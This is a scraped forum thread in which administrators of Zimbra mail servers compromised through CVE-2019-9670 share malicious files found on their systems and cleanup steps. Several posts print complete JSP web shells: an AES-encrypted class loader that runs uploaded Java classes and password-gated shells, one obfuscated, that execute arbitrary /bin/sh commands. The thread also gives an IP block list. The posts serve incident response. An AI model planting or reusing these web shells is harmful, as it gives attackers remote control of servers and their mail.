CVE-2019-9670 being actively exploited (Hacked Server)
Re: CVE-2019-9670 being actively exploited
Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.
<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
>>
<</opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbraAdmin/public/jsp/Alert.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("Hok8gxZFafGORRLCiowY_vpqNappusQV8agmQkI7wKk")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
>>
Thank you.
With Regards
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.
<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
>>
<</opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbraAdmin/public/jsp/Alert.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("Hok8gxZFafGORRLCiowY_vpqNappusQV8agmQkI7wKk")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
>>
Thank you.
With Regards
Re: CVE-2019-9670 being actively exploited
The problem appeared again. Do you have these folders?
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp
with:
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java
and
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.class
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.java
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/Docs_jsp.class
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/Docs_jsp.java
@Drake, yes, the files you mentioned are infected.
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp
with:
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java
and
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.class
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.java
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/Docs_jsp.class
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/Docs_jsp.java
@Drake, yes, the files you mentioned are infected.
Re: CVE-2019-9670 being actively exploited
I notised that 2 days a row at 9:18 (my local time) sed is started. it works about 10-20 seconds and after that zmswath appears and all of this.
Can this be used somehow?
Can this be used somehow?
-
- Posts: 3
- Joined: Tue May 28, 2019 12:41 pm
Re: CVE-2019-9670 being actively exploited
Yes, it's malicious code. And your version confirm that the key used by the hacker is not fixed.Drake wrote:Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.
<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
>>
Thank you.
With Regards
Basically, this code allows the hacker to upload an encrypted java class and to execute code in it.
Re: CVE-2019-9670 being actively exploited
Help me with this plz :
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}
Do you have these files at all?
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}
Do you have these files at all?
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java
Re: CVE-2019-9670 being actively exploited
erefer thanks for the reply. Regarding the key used by the hacker do i need to do something else than just deleting these two files?erefer@gmail.com wrote:Yes, it's malicious code. And your version confirm that the key used by the hacker is not fixed.Drake wrote:Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.
<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
>>
Thank you.
With Regards
Basically, this code allows the hacker to upload an encrypted java class and to execute code in it.
Thank you in advance
With Regards
Re: CVE-2019-9670 being actively exploited
I have not.elby wrote:Help me with this plz :
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}
Do you have these files at all?
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java
/opt/zimbra/mailboxd/work/zimbraAdmin/ exists but is empty.
Running 8.6
Re: CVE-2019-9670 being actively exploited
Can you check the following code found in the corresponding files and tell if it is malicious.
[root@we ~]# cat /opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp
<% if ( "nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA"
.equals( request.getParameter( "p" +
"pwd" ) ) )
{ java.io.InputStream AwDiE = Runtime.getRuntime()
.exec
( new
String[]
{
"/" + "bin/sh"
, "-c"
, request.getParameter(
"p" + "com"
) } )
.getInputStream()
; int MqP
= -1
;
byte[] NtRe
=
new
byte[ 22 ]
; out.print(
"<"
+
"pre>"
) ;
while(
( MqP = AwDiE.read( NtRe
) ) != -1 ) { out.print( new String( NtRe,
0, MqP ) ) ; }
out.print( "</" + "pre>" ) ;
} %>
Also , what is the meaning of this line :
[root@we~]# cat /opt/zimbra/log/access_log.2019-05-30 | grep pyth
218.103.121.116 - - [30/May/2019:00:14:20 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 5
[root@we ~]# cat /opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp
<% if ( "nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA"
.equals( request.getParameter( "p" +
"pwd" ) ) )
{ java.io.InputStream AwDiE = Runtime.getRuntime()
.exec
( new
String[]
{
"/" + "bin/sh"
, "-c"
, request.getParameter(
"p" + "com"
) } )
.getInputStream()
; int MqP
= -1
;
byte[] NtRe
=
new
byte[ 22 ]
; out.print(
"<"
+
"pre>"
) ;
while(
( MqP = AwDiE.read( NtRe
) ) != -1 ) { out.print( new String( NtRe,
0, MqP ) ) ; }
out.print( "</" + "pre>" ) ;
} %>
Also , what is the meaning of this line :
[root@we~]# cat /opt/zimbra/log/access_log.2019-05-30 | grep pyth
218.103.121.116 - - [30/May/2019:00:14:20 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 5
Re: CVE-2019-9670 being actively exploited
hHi
Maybe this will help someone.
#0 - I did all steps suggested in this post and all from https://lorenzo.mile.si/zimbra-cve-2019 ... ction/961/ and I still had this problem, so I did:
#1 - find all corrupted files containing:
example:
#2 - block all those IP
#4 - reboot the system (required to stop all connections or kill all active connections)
After this, I have almost a week without any problems.
Maybe this will help someone.
#0 - I did all steps suggested in this post and all from https://lorenzo.mile.si/zimbra-cve-2019 ... ction/961/ and I still had this problem, so I did:
#1 - find all corrupted files containing:
and remove code starting from %if ("HASSSSHHHHH to ; } %grep "if.*equals(" -R /opt/zimbra/mailboxd/
example:
If the file is binary, remove a whole file.<%
if ( "N67nqYcLWDOojFzFNvPCSAPQKg7VysUYXclEM1BZBIQ" .equals(
.....
QokFueMBi ) ) ;
} out.print(
"</p"
+ "re>"
) ; } %>
#2 - block all those IP
- 141.98.80.47
71.6.146.130
158.69.195.70
85.234.126.0/24
185.211.245.0/24
89.248.0.0/16
46.3.96.2
#4 - reboot the system (required to stop all connections or kill all active connections)
After this, I have almost a week without any problems.
Re: CVE-2019-9670 being actively exploited
Всем привет.
Hi everyone
Мне кажется стоит ещё обратить внимание на данную статью:
( https://blog.tint0.com/2019/03/a-saga-o ... html#href1 )
I think it is also worth paying attention to this article:
( https://blog.tint0.com/2019/03/a-saga-o ... html#href1 )
Hi everyone
Мне кажется стоит ещё обратить внимание на данную статью:
( https://blog.tint0.com/2019/03/a-saga-o ... html#href1 )
I think it is also worth paying attention to this article:
( https://blog.tint0.com/2019/03/a-saga-o ... html#href1 )